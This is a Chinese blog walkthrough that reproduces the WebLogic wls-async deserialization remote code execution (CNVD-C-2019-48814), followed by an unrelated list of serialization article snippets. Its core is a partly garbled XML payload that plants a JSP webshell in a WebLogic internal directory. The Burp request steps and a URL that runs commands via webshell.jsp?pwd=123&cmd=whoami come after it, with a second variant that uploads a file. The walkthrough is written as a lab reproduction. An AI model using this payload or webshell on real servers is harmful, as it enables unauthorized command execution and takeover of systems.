张玉安(ღ˘⌣˘ღ)
张玉安(ღ˘⌣˘ღ)

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)

一,防御简述:

跟该漏洞存在于wls9-async组件,这个组件主要作用是异步通讯服务,攻击者可以向/ _async / AsyncResponseService路径下构造良好的xml格式的数据,并保存在数据中的服务器端反序列化时,执行其中的恶意代码,从而可以getshell。

影响版本:

Oracle WebLogic Server的10.3.6.0.0

Oracle WebLogic Server的12.1.3.0.0

Oracle WebLogic Server的12.2.1.1.0

Oracle WebLogic Server的12.2.1.2.0

二,环境建设

 靶机:windows server 2008 R2:构建weblogic服务器

三,漏洞复现

访问:  http:// your-ip:7001 / _async / AsyncResponseService

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第1张图片
payload:

	
	xxxx
	
	
	
	servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/webshell.jsp
	");          
	while((a=in.read(b))!=-1){
	out.println(new String(b));          
	}
	out.print("");
	} 
	%>]]>
	

burp抓包,发送到repeater

将GET替换POST,然后修改内容类型为text / xml

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第2张图片

go一下,查看返回值,我们的webshel​​l.jsp已经上传完毕

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第3张图片

 访问:http://192.168.15.89:7001 / bea_wls_internal / webshel​​l.jsp?pwd = 123&cmd = whoami
  获取用户,这里通过传输cmd命令,查询信息

WebLogic wls-async 反序列化远程命令执行漏洞(CNVD-C-2019-48814)_第4张图片

 上传文件

Content-Type: text/xml
Content-Length: 714
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20191129103954316.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L292b3dvdm8=,size_16,color_FFFFFF,t_70)
xxxxservers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/sh.jsp





这个时候你上传的文件sh.jsp内容为456就会上传到下面的目录里面

l http:// ip:port / bea_wls_internal / sh.jsp

成功后,查看写入的文件

————————————————
推荐行业大佬------Stephen Wolf
原文链接:https://blog.csdn.net/qq_45625605/article/details/103215894

你可能感兴趣的:(反序列化)

  • 使用WAF防御网络上的隐蔽威胁之反序列化攻击 baiolkdnhjaio 网络安全
    什么是反序列化反序列化是将数据结构或对象状态从某种格式转换回对象的过程。这种格式通常是二进制流或者字符串(如JSON、XML),它是对象序列化(即对象转换为可存储或可传输格式)的逆过程。反序列化的安全风险反序列化的安全风险主要来自于处理不受信任的数据源时的不当反序列化。如果应用程序反序列化了恶意构造的数据,攻击者可能能够执行代码、访问敏感数据、进行拒绝服务攻击等。这是因为反序列化过程中可能会自动触
  • 【保姆级】Protobuf详解及入门指南 AQin1012 Java网络protobuf序列化二进制协议协议Java
    目录Protobuf概述什么是Protobuf为什么要使用ProtobufProtobuf实战环境配置创建文件解析/封装数据附录AQin.proto完整代码Protobuf概述什么是ProtobufProtobuf(ProtocolBuffers)协议Protobuf是一种由Google开发的二进制序列化格式和相关的技术,它用于高效地序列化和反序列化结构化数据,通常用于网络通信、数据存储等场景为什
  • 第 12 章 Spring MVC 扩展和 SSM 框架整合 HUNAG-DA-PAO springmvcjava
    SpringMVC框架处理JSON数据SON格式数据在现阶段的Web项目开发中扮演着非常重要的角色。在前端页面和后台交互的过程中,需要一种格式清晰、高效且两端都可以轻松使用的数据格式做交互的媒介,JSON正可以满足这一需求。JSON数据的传递处理在Java中处理JSON数据的传递通常涉及到序列化和反序列化操作。序列化是将Java对象转换为JSON格式的字符串,以便可以将其存储或通过网络传输;反序列
  • flink table factory基础知识 loukey_j
    一、概述在flink中很多组件都是TableFactory的子类。比如序列化,反序列化,tableSinkFactory,tableSourceFactory.TableFactory是用来创建序列化,反序列器,tableSource和tableSink的工厂。二、TableFactory源码在flink框架中,TableFactory的子类并不是程序员自己随心new出来的。flink的提供给程序
  • [Moshi]认识新一代对Kotlin友好的JSON解析框架 天空光芒
    为什么是Moshi切换到kotlin之后,在使用fastJSON时遇到了一些问题,经过网上的查询,要使fastJSON能够正常工作,需要额外添加kotlin-reflect依赖,感觉不是很爽。于是一通搜索之后,找到了著名的Square团队的又一个优秀的开源库——Moshi。它在允许使用传统的反射机制进行JSON序列化与反序列化的同时,也可以通过注解的方式在编译时生成解析类,不必引入2M+的refl
  • 使用WAF防御网络上的隐蔽威胁之反序列化攻击 白帽学子 网络安全
    什么是反序列化反序列化是将数据结构或对象状态从某种格式转换回对象的过程。这种格式通常是二进制流或者字符串(如JSON、XML),它是对象序列化(即对象转换为可存储或可传输格式)的逆过程。反序列化的安全风险反序列化的安全风险主要来自于处理不受信任的数据源时的不当反序列化。如果应用程序反序列化了恶意构造的数据,攻击者可能能够执行代码、访问敏感数据、进行拒绝服务攻击等。这是因为反序列化过程中可能会自动触
  • Hadoop Common 之序列化机制小解 猫君之上 #ApacheHadoop
    1.JavaSerializable序列化该序列化通过ObjectInputStream的readObject实现序列化,ObjectOutputStream的writeObject实现反序列化。这不过此种序列化虽然跨病态兼容性强,但是因为存储过多的信息,但是传输效率比较低,所以hadoop弃用它。(序列化信息包括这个对象的类,类签名,类的所有静态,费静态成员的值,以及他们父类都要被写入)publ
  • JsonCpp源码分析——Reader 哎呦,帅小伙哦 #jsoncppjson
    1、与Writer模块功能相反,可以将Reader理解成一个反序列化的工具,Writer的作用主要是将Value对象转成string或者流式的结构,Reader的作用主要是将流式的结构转成Value类型的对象。Reader类的主要职责有3个,解析JSON字符串:将JSON格式的字符串读取并解析成相应的C++数据结构。处理不同的数据类型,支持解析JSON对象、数组、字符串、数字、布尔值和null。处
  • Redis的incr命令引发的反序列化异常和ERR value is not an integer or out of range异常 臣妾写不来啊 Java编码技巧redis数据库缓存
    在Java中使用inc命令的时候发现redis中的值被反序列化后居然不是数字,检查后发现可能是序列化器没对,在redis配置的地方将序列化器设置为Jackson2JsonRedisSerializer后使用整成,贴上代码@Bean(name="RedisTemplate")@SuppressWarnings("all")publicRedisTemplateredisTemplate(RedisC
  • 反序列化漏洞 Slash_HK web安全相关php安全web安全
    JavaPHP反序列化总结文章目录一.PHP反序列化1.序列化serialize()2.反序列化unserialize()二.反序列化漏洞1.漏洞利用Magicfunction2.漏洞利用思路三._construct()的利用2.利用普通成员类方法四.PHP反序列化漏洞总结1.CVE-2016-7124一.PHP反序列化1.序列化serialize()首先我们创建了一个对象,通过serialize
  • Java高级编程—I/O流(包括字节输入流、字节输出流、字符输出流、字符输入流、缓冲流、序列化流、反序列化流等,详解 附有代码+案例) 蔚一 Java知识java开发语言算法intellij-idea
    文章目录二十七.I/O流27.1概述27.2分类27.3字节输出流27.3.1数据写入本地文件27.3.2换行、续写27.4字节输入流27.4.1读取数据到程序27.4.2循环读取27.4.3拷贝数据27.4.4一次读取多个27.6字符输入流27.6.1FileReader的使用27.7字符输出流27.8.缓冲流27.8.1字节缓冲流27.8.1.1拷贝文件(一)27.8.1.2拷贝文件(二)27
  • shiro 采用redis共享session,出现反序列化错误的排查过程 nightseventhunit redisjava数据库
    这是一个老系统改造的过程,该老系统采用的框架是#jfinal#shiroredis,采用outh2协议的方式,对多个子系统之间进行单点登录,以实现系统之间的session,由于速度方面的影响,现在要改造成多个系统之间共享session,并采用redis集群的方式。说明一下当前项目的整体运行环境,此项目的多个子系统都在同一个域名下,通过上下文不同来区分子系统。以下将记录整个改造过程,采用jfinal
  • Hive 的 SerDe 是什么? Shockang 大数据技术体系大数据hive
    前言本文隶属于专栏《1000个问题搞定大数据技术体系》,该专栏为笔者原创,引用请注明来源,不足和错误之处请在评论区帮忙指出,谢谢!本专栏目录结构和参考文献请见1000个问题搞定大数据技术体系正文hive的SerDe是什么SerDe是Serializer/Deserializer的简写。hive使用SerDe进行行对象的序列与反序列化。最后实现把文件内容映射到hive表中的字段数据类型。为了更好的阐
  • 【web | CTF】攻防世界 Web_php_unserialize 星盾网安 CTF-Webphp开发语言
    天命:这条反序列化题目也是比较特别,里面的漏洞知识点,在现在的php都被修复了天命:而且这次反序列化的字符串数量跟其他题目不一样file=$file;}//销毁时候触发,相当于是打印flag文件出来function__destruct(){echo@highlight_file($this->file,true);}//这个方法不会触发,估计是旧版本的php,满足某些情况所以没有触发//纯碎用来吓
  • 【攻防世界】Web_php_unserialize Miracle& webweb安全网络安全
    1.信息收集:从题目:知道反序列化;2.源码审计:file=$file;}function__destruct(){//析构函数在对象被销毁时自动调用,用于执行一些清理操作或释放资源。echo@highlight_file($this->file,true);}function__wakeup(){//在反序列化对象时自动调用if($this->file!='index.php'){//these
  • 攻防世界-Web_php_unserialize roast mouse php网络安全
    攻防世界-Web_php_unserialize分析php代码file=$file;}//析构函数function__destruct(){//打开指定文件,并高亮文件中内容,第二个为return参数,为true,函数将返回高亮显示的代码字符串,而不是直接输出到浏览器。echo@highlight_file($this->file,true);}//wakeup魔法函数,在反序列化之前调用。fun
  • 攻防世界 Web_php_unserialize Cyan1u #攻防世界php
    Web_php_unserializePHP反序列化看看代码file=$file;}function__destruct(){echo@highlight_file($this->file,true);}function__wakeup(){if($this->file!='index.php'){//thesecretisinthefl4g.php$this->file='index.php';
  • Kafka 常用的传输和序列化数据方式 傲雪凌霜,松柏长青 后端大数据kafka分布式
    Kafka常用的传输和序列化数据方式。不同的方式有不同的优缺点,选择哪种方式通常取决于具体的应用场景、性能要求、数据兼容性需求等。以下是几种常见的方式,包括:1.ProtoBuf(ProtocolBuffers)概述:ProtoBuf是Google开发的一种语言中立、平台中立的高效二进制序列化格式,广泛应用于RPC、数据传输和存储等场景。优点:高效的二进制格式,序列化和反序列化速度快,数据体积小。
  • Java高级教程秘籍-13章_IO流下 AdaCoding javapython开发语言
    Java高级教程秘籍-13章_IO流下六、其它的流的使用1.标准的输入输出流:2.打印流:3.数据流:七、对象流的使用1.对象流:2.作用:3.对象的序列化机制:4.序列化代码实现:5.反序列化代码实现:6.实现序列化的对象所属的类需要满足:八、RandomAccessFile的使用1.随机存取文件流:RandomAccessFile2.使用说明:3.典型代码九、Path、Paths、Files的
  • C# XML 使用教程 十⑧ C#通用的知识c#xml后端
    C#XML使用教程目录C#XML使用教程XML是什么介绍组成XML与HTML的区别C#中如何使用XML序列化根元素子元素序列化方法反序列化反序列化方法序列化与反序列化实例XML是什么介绍可扩展标记语言(ExtensibleMarkupLanguage,XML),标准通用标记语言的子集,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML是标准通用标记语言,可扩展性
  • 设计模式之单例模式(七种方法超详细) 猴哥敲代码 设计模式单例模式设计模式java
    设计模式之单例设计模式简介1.单例模式的实现1.1饿汉式饿汉式-方式1(静态变量方式)饿汉式-方式2(静态代码块方式)1.2懒汉式懒汉式-方式1(线程不安全)懒汉式-方式2(线程安全)懒汉式-方式3(双重检查锁)懒汉式-方式4(静态内部类方式)补充:饿汉式-方式3(枚举方式)2.单例模式存在的问题2.1单例模式被破坏●序列化反序列化破坏单例模式●反射破坏单例模式2.2原因分析2.3问题解决●序列化
  • CLR via C# 读书笔记 6-2 不同AppDomain之间的通信 xuefeiliuyuxiu 面试准备C#
    原文:http://www.cnblogs.com/PurpleTide/archive/2011/01/06/1927643.html跨AppDomain通信有两种方式1.MarshalByreference:传递引用2.MarshalByValue:把需要传递的对象通过序列化反序列化的方式传递过去(值拷贝)只有标记为可序列化Serializable的类才能通过MarshalByValue的方式
  • C# —— 序列化与反序列化 人狮子 C#c#
    概念序列化通过使用不同的类(BinaryFormatter,SoapFormatter,XmlSerializer)将对象状态转换为可保持或传输的格式的过程,具体是将对象转变为字节流,其目的是为了保存数据的状态,方便后续还原调用。包括三种序列化形式:二进制序列化,SOAP序列化,XML序列化。于此过程相反,将序列化文件转换为对象的过程称为反序列化。区别二进制和SOAP格式可序列化所有可序列化字段,
  • JSON字符串反序列化失败:requires a JSON array (e.g. [1,2,3]) 向上的车轮 笔记
    CannotdeserializethecurrentJSONobject(e.g.{\"name\":\"value\"})intotype'System.Collections.Generic.List`1……becausethetyperequiresaJSONarray(e.g.[1,2,3])todeserializecorrectly.Tofixthiserroreitherchang
  • effective java笔记 Mrryo
    1、Java中创建(实例化)对象的五种方式:a、new一个对象。b、反射,Objecta=Class.forName("java.lang.Object").newInstance();c、通过I/O流(包括反序列化)。d、对象的clone()。e、通过工厂方法返回对象。2、抽象类,要想对其实例化,只能用getInstance().(单例模式)。3、内存泄漏:用数组、集合、缓存、监听器等时要注意释
  • python反序列化 MESSIR22 python开发语言
    前言:最近打比赛遇到了就简单记录学习一下一、概念什么是序列化?序列化是将Python对象转换为一种可以存储或传输的格式的过程。常见的序列化格式包括JSON、XML、protobuf以及Python自带的pickle模块。什么是反序列化?反序列化是将序列化的数据转换回Python对象的过程。这使得我们可以从文件、网络或其他存储介质中恢复对象的状态。Python中的序列化和反序列化1.使用pickle
  • JS之对象精讲(一) 坤坤不会编程 精讲JSjavascript开发语言正则表达式json前端
    文章目录对象的属性和访问方式对象的属性数据属性访问器属性属性的访问方式创建对象1.基于Object()构造函数2.基于对象字面量3.基于工厂方法模式4.基于构造函数模式5.基于原型对象的模式6.构造函数和原型混合模式7.基于动态原型模式对象克隆浅克隆深克隆JSON序列化和反序列化原型对象原型对象、构造函数、实例之间的关系实例属性的读取顺序重写原型对象原型链原型链的特点属性区分_proto_属性JS
  • SpringBoot 集成JprotoBuf实现protobuf类型的接口 一碗情深 Javaspringboot后端javaprotobuf
    文章目录前言一、实现protobuf类型的接口1.编写Controller2.模拟客户端发起请求3.Postman中发起请求二、教程源码获取前言这篇文章我们讲解了protoBuf和JprotoBuf的区别,并实现SpringBoot集成JprotoBuf:SpringBootJprotoBuf序列化与反序列化的实现本文将基于以上文章内容继续讲解集成JprotoBuf之后实现application/
  • Spring 楚楚ccc Java系列java
    1.1工厂设计模式、Spring工厂的底层实现原理EJB实现原理:就是将原来在客户端实现的代码放至服务端,并依靠RMI进行通信RMI实现原理:通过java可序列化机制实现分布式计算补充序列化:就是将java对象转换为字节序列,以便保存到硬盘或进行网络传输。反序列化则是将字节序列转换为java对象。服务器集群:通过RMI通信,连接不同功能模块的服务器,实现完整的功能EJB存在问题:重量级框架,运行环
  • json工具类 java_JAVA中封装JSONUtils工具类及使用 weixin_39581318 json工具类java
    在JAVA中用json-lib-2.3-jdk15.jar包中提供了JSONObject和JSONArray基类,用于JSON的序列化和反序列化的操作。但是我们更习惯将其进一步封装,达到更好的重用。封装后的JSON工具类JSONUtils.java代码如下:JSONUtils代码,点击展开importjava.util.ArrayList;importjava.util.Collection;im
  • ASM系列四 利用Method 组件动态注入方法逻辑 lijingyao8206 字节码技术jvmAOP动态代理ASM
            这篇继续结合例子来深入了解下Method组件动态变更方法字节码的实现。通过前面一篇,知道ClassVisitor 的visitMethod()方法可以返回一个MethodVisitor的实例。那么我们也基本可以知道,同ClassVisitor改变类成员一样,MethodVIsistor如果需要改变方法成员,注入逻辑,也可以
  • java编程思想 --内部类 百合不是茶 java内部类匿名内部类
    内部类;了解外部类 并能与之通信 内部类写出来的代码更加整洁与优雅   1,内部类的创建  内部类是创建在类中的 package com.wj.InsideClass; /* * 内部类的创建 */ public class CreateInsideClass { public CreateInsideClass(
  • web.xml报错 crabdave web.xml
    web.xml报错   The content of element type "web-app" must match "(icon?,display-  name?,description?,distributable?,context-param*,filter*,filter-mapping*,listener*,servlet*,s
  • 泛型类的自定义 麦田的设计者 javaandroid泛型
       为什么要定义泛型类,当类中要操作的引用数据类型不确定的时候。 采用泛型类,完成扩展。   例如有一个学生类     Student{ Student(){ System.out.println("I'm a student....."); } }  有一个老师类  
  • CSS清除浮动的4中方法 IT独行者 JavaScriptUIcss
    清除浮动这个问题,做前端的应该再熟悉不过了,咱是个新人,所以还是记个笔记,做个积累,努力学习向大神靠近。CSS清除浮动的方法网上一搜,大概有N多种,用过几种,说下个人感受。 1、结尾处加空div标签 clear:both 1 2 3 4 .div 1 { background : #000080 ; border : 1px   s
  • Cygwin使用windows的jdk 配置方法 _wy_ jdkwindowscygwin
    1.[vim /etc/profile]    JAVA_HOME="/cgydrive/d/Java/jdk1.6.0_43"  (windows下jdk路径为D:\Java\jdk1.6.0_43)    PATH="$JAVA_HOME/bin:${PATH}"    CLAS
  • linux下安装maven 无量 mavenlinux安装
    Linux下安装maven(转) 1.首先到Maven官网 下载安装文件,目前最新版本为3.0.3,下载文件为 apache-maven-3.0.3-bin.tar.gz,下载可以使用wget命令; 2.进入下载文件夹,找到下载的文件,运行如下命令解压 tar -xvf  apache-maven-2.2.1-bin.tar.gz 解压后的文件夹
  • tomcat的https 配置,syslog-ng配置 aichenglong tomcathttp跳转到httpssyslong-ng配置syslog配置
    1) tomcat配置https,以及http自动跳转到https的配置     1)TOMCAT_HOME目录下生成密钥(keytool是jdk中的命令)      keytool -genkey -alias tomcat -keyalg RSA -keypass changeit -storepass changeit
  • 关于领号活动总结 alafqq 活动
    关于某彩票活动的总结 具体需求,每个用户进活动页面,领取一个号码,1000中的一个; 活动要求 1,随机性,一定要有随机性; 2,最少中奖概率,如果注数为3200注,则最多中4注 3,效率问题,(不能每个人来都产生一个随机数,这样效率不高); 4,支持断电(仍然从下一个开始),重启服务;(存数据库有点大材小用,因此不能存放在数据库) 解决方案 1,事先产生随机数1000个,并打
  • java数据结构 冒泡排序的遍历与排序 百合不是茶 java
    java的冒泡排序是一种简单的排序规则   冒泡排序的原理:           比较两个相邻的数,首先将最大的排在第一个,第二次比较第二个 ,此后一样;         针对所有的元素重复以上的步骤,除了最后一个     例题;将int array[]
  • JS检查输入框输入的是否是数字的一种校验方法 bijian1013 js
    如下是JS检查输入框输入的是否是数字的一种校验方法: <form method=post target="_blank"> 数字:<input type="text" name=num onkeypress="checkNum(this.form)"><br> </form>
  • Test注解的两个属性:expected和timeout bijian1013 javaJUnitexpectedtimeout
    JUnit4:Test文档中的解释:   The Test annotation supports two optional parameters.   The first, expected, declares that a test method should throw an exception.   If it doesn't throw an exception or if it
  • [Gson二]继承关系的POJO的反序列化 bit1129 POJO
    父类     package inheritance.test2; import java.util.Map; public class Model { private String field1; private String field2; private Map<String, String> infoMap
  • 【Spark八十四】Spark零碎知识点记录 bit1129 spark
    1. ShuffleMapTask的shuffle数据在什么地方记录到MapOutputTracker中的 ShuffleMapTask的runTask方法负责写数据到shuffle map文件中。当任务执行完成成功,DAGScheduler会收到通知,在DAGScheduler的handleTaskCompletion方法中完成记录到MapOutputTracker中  
  • WAS各种脚本作用大全 ronin47 WAS 脚本
       http://www.ibm.com/developerworks/cn/websphere/library/samples/SampleScripts.html    无意中,在WAS官网上发现的各种脚本作用,感觉很有作用,先与各位分享一下     获取下载 这些示例 jacl 和 Jython 脚本可用于在 WebSphere Application Server 的不同版本中自
  • java-12.求 1+2+3+..n不能使用乘除法、 for 、 while 、 if 、 else 、 switch 、 case 等关键字以及条件判断语句 bylijinnan switch
    借鉴网上的思路,用java实现: public class NoIfWhile { /** * @param args * * find x=1+2+3+....n */ public static void main(String[] args) { int n=10; int re=find(n); System.o
  • Netty源码学习-ObjectEncoder和ObjectDecoder bylijinnan javanetty
    Netty中传递对象的思路很直观: Netty中数据的传递是基于ChannelBuffer(也就是byte[]); 那把对象序列化为字节流,就可以在Netty中传递对象了 相应的从ChannelBuffer恢复对象,就是反序列化的过程 Netty已经封装好ObjectEncoder和ObjectDecoder 先看ObjectEncoder ObjectEncoder是往外发送
  • spring 定时任务中cronExpression表达式含义 chicony cronExpression
    一个cron表达式有6个必选的元素和一个可选的元素,各个元素之间是以空格分隔的,从左至右,这些元素的含义如下表所示: 代表含义            是否必须 允许的取值范围         &nb
  • Nutz配置Jndi ctrain JNDI
    1、使用JNDI获取指定资源: var ioc = { dao : { type :"org.nutz.dao.impl.NutDao", args : [ {jndi :"jdbc/dataSource"} ] } } 以上方法,仅需要在容器中配置好数据源,注入到NutDao即可.
  • 解决 /bin/sh^M: bad interpreter: No such file or directory daizj shell
    在Linux中执行.sh脚本,异常/bin/sh^M: bad interpreter: No such file or directory。   分析:这是不同系统编码格式引起的:在windows系统中编辑的.sh文件可能有不可见字符,所以在Linux系统下执行会报以上异常信息。 解决: 1)在windows下转换: 利用一些编辑器如UltraEdit或EditPlus等工具
  • [转]for 循环为何可恨? dcj3sjt126com 程序员读书
      Java的闭包(Closure)特征最近成为了一个热门话题。 一些精英正在起草一份议案,要在Java将来的版本中加入闭包特征。 然而,提议中的闭包语法以及语言上的这种扩充受到了众多Java程序员的猛烈抨击。 不久前,出版过数十本编程书籍的大作家Elliotte Rusty Harold发表了对Java中闭包的价值的质疑。 尤其是他问道“for 循环为何可恨?”[http://ju
  • Android实用小技巧 dcj3sjt126com android
    1、去掉所有Activity界面的标题栏   修改AndroidManifest.xml   在application 标签中添加android:theme="@android:style/Theme.NoTitleBar"   2、去掉所有Activity界面的TitleBar 和StatusBar    修改AndroidManifes
  • Oracle 复习笔记之序列 eksliang Oracle 序列sequenceOracle sequence
    转载请出自出处:http://eksliang.iteye.com/blog/2098859 1.序列的作用 序列是用于生成唯一、连续序号的对象 一般用序列来充当数据库表的主键值 2.创建序列语法如下:   create sequence s_emp start with 1 --开始值 increment by 1 --増长值 maxval
  • 有“品”的程序员 gongmeitao 工作
    完美程序员的10种品质     完美程序员的每种品质都有一个范围,这个范围取决于具体的问题和背景。没有能解决所有问题的   完美程序员(至少在我们这个星球上),并且对于特定问题,完美程序员应该具有以下品质:   1. 才智非凡- 能够理解问题、能够用清晰可读的代码翻译并表达想法、善于分析并且逻辑思维能力强   (范围:用简单方式解决复杂问题)  
  • 使用KeleyiSQLHelper类进行分页查询 hvt sql.netC#asp.nethovertree
    本文适用于sql server单主键表或者视图进行分页查询,支持多字段排序。KeleyiSQLHelper类的最新代码请到http://hovertree.codeplex.com/SourceControl/latest下载整个解决方案源代码查看。或者直接在线查看类的代码:http://hovertree.codeplex.com/SourceControl/latest#HoverTree.D
  • SVG 教程 (三)圆形,椭圆,直线 天梯梦 svg
    SVG <circle> SVG 圆形 - <circle> <circle> 标签可用来创建一个圆: 下面是SVG代码: <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <circle cx="100" c
  • 链表栈 luyulong java数据结构
    public class Node { private Object object; private Node next; public Node() { this.next = null; this.object = null; } public Object getObject() { return object; } public
  • 基础数据结构和算法十:2-3 search tree sunwinner Algorithm2-3 search tree
      Binary search tree works well for a wide variety of applications, but they have poor worst-case performance. Now we introduce a type of binary search tree where costs are guaranteed to be loga
  • spring配置定时任务 stunizhengjia springtimer
    最近因工作的需要,用到了spring的定时任务的功能,觉得spring还是很智能化的,只需要配置一下配置文件就可以了,在此记录一下,以便以后用到:     //------------------------定时任务调用的方法------------------------------ /** * 存储过程定时器 */ publi
  • ITeye 8月技术图书有奖试读获奖名单公布 ITeye管理员 活动
    ITeye携手博文视点举办的8月技术图书有奖试读活动已圆满结束,非常感谢广大用户对本次活动的关注与参与。 8月试读活动回顾: http://webmaster.iteye.com/blog/2102830 本次技术图书试读活动的优秀奖获奖名单及相应作品如下(优秀文章有很多,但名额有限,没获奖并不代表不优秀): 《跨终端Web》 gleams:http
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他